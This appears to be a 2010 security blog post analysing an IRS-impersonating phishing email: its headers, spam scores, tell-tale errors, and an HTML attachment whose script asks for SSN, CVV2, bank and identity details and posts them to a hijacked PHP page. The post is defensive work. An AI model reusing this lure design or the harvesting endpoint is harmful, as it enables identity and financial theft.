Four days ago I received an email from tax-refunds@irs.gov. A selection of interesting headers from the message appears below (sensitive information, such as my email address, elided). You’ll note two things. First, this email came to one of my U of C addresses, but it purports to be from the IRS. Why would the IRS (an American government agency) be sending a legitimate email to some random Canadian email address (yes, I’m a US citizen, but that’s besides the point — we’re playing the odds here, and certainly I have other valid US-based addresses the IRS could reach out to). So: strike one. Second, the U of C spam filter correctly tagged this as spam (hence the {Spam?} prefix in the Subject header. Strike two. Finally, the IRS itself says that it does not request information via email: http://www.irs.gov/privacy/article/0,,id=179820,00.html. Strike three. But it gets better. The phisher keeps swinging for the fences.
Return-Path:
Received: from correo.ziv.es (correo.ziv.es [77.226.243.115]) by
forward.ucalgary.ca (Postfix) with ESMTP id 25CE038227 for
; Mon, 6 Sep 2010 19:10:26 -0600 (MDT)
thread-index: ActOKXOX06gLrg0bRziJn6dBptyFCg==
Received: from User ([60.32.171.42]) by correo.ziv.es with Microsoft
SMTPSVC(6.0.3790.3959); Tue, 7 Sep 2010 03:10:24 +0200
From:
Subject: {Spam?} IRS Annual Notification (ID: A20W852)
Date: Tue, 7 Sep 2010 03:10:32 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”—-=_NextPart_000_009D_01C2A9A6.691CE492″
X-Priority: 3
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Message-ID:
To: undisclosed-recipients:;
X-Foo-MailScanner: Found to be clean
X-Foo-MailScanner-SpamCheck: spam, SpamAssassin (not cached,
score=11.622, required 6.2, autolearn=disabled, BAYES_99 5.50,
FORGED_MUA_OUTLOOK 3.12, FORGED_OUTLOOK_HTML 0.00, HTML_IMAGE_ONLY_20
1.55, HTML_MESSAGE 0.00, HTML_SHORT_LINK_IMG_3 0.00, MIME_HTML_ONLY 1.46)
X-Foo-MailScanner-SpamScore: sssssssssss
X-Foo-MailScanner-From: tax-refunds@irs.gov
X-Spam-Status: Yes
The headers indicate that someone connected to a Spanish ISP (I’m guessing from “correo” and .es) has fallen victim to a spambot using their Microsoft Outlook Express (or this could be forged information, but why include code for mailing in your bot when you can just ask the OS to ask an application to do it on your behalf?). Spanish citizens probably aren’t sending email on behalf of the IRS. Strike four.
This message contained some boilerplate legalese (“This message is intended only for the use of the individual…blah blah blah”) and an HTML attachment. The boilerplate language also contained the sentence: “Any views or opinions presented are solely those of the author and do not necessarily represent those of the company.” The IRS is an agency, not a company, and so this sentence doesn’t jive. Strike five.
The HTML attachment was more interesting, although quite a basic attempt at phishing. I saved it to a file system and use the Unix `file’ command to see the general format of what it might contain:
[locasto@xorenduex quarantine]$ file Refund_Payment_Form\(ID\ A20W852\).html
Refund_Payment_Form(ID A20W852).html: ASCII English text, with very long lines, with CRLF line terminators
[locasto@xorenduex quarantine]$
Using the Unix `more’ command, I started to scroll through the file. Most of it appears to be a fairly standard scrape of a real IRS web page.
At line 324, however, we see an HTML table definition that contains a brief Javascript program starting at line 338 (immediately before this, the phisher attempts to close any other active script context with an “end” SCRIPT tag. The script is mean to check HTML form input before submission. It pops up Javascript alert boxes asking for a series of items. It starts by asking 3 times for your SSN, then requests your CVC/CVV2 (those short codes on the back of your credit card), your ATM signature, credit card expiration month and year, full name, billing address, home phone, date of birth (3X), mother’s maiden name, and name of your bank.
Places to enter this information appear in an HTML form defined immediately after this script. The target action of this form is to post the information the victim gives it to a PHP web page at hikinginn.com. The URL looks like some bulletin board or photo gallary: “/bbs/data/egallery/119701770/indexppl.php”. Presumably this page has been hijacked to contain code that accepts data from this phishing attempt. When I used wget to fetch this page, wget returned an HTTP 404 (Not Found) error, indicating that this page may well have been taken down.
[locasto@xorenduex quarantine]$ wget http://www.hikinginn.com/bbs/data/egallery/1197017760/indexppl.php
--10:54:55-- http://www.hikinginn.com/bbs/data/egallery/1197017760/indexppl.php
=> `indexppl.php'
Resolving www.hikinginn.com... 218.232.66.19
Connecting to www.hikinginn.com|218.232.66.19|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
10:54:56 ERROR 404: Not Found.
The web site itself is for a resort on the Korean island of Jeju.
By the way, if you’re confused about what CVC/CVV2 is, then the phishing form helpfully asks: “Need help with CVC/CVV2?” and links this question text to: http://www.sti.nasa.gov/cvv.html
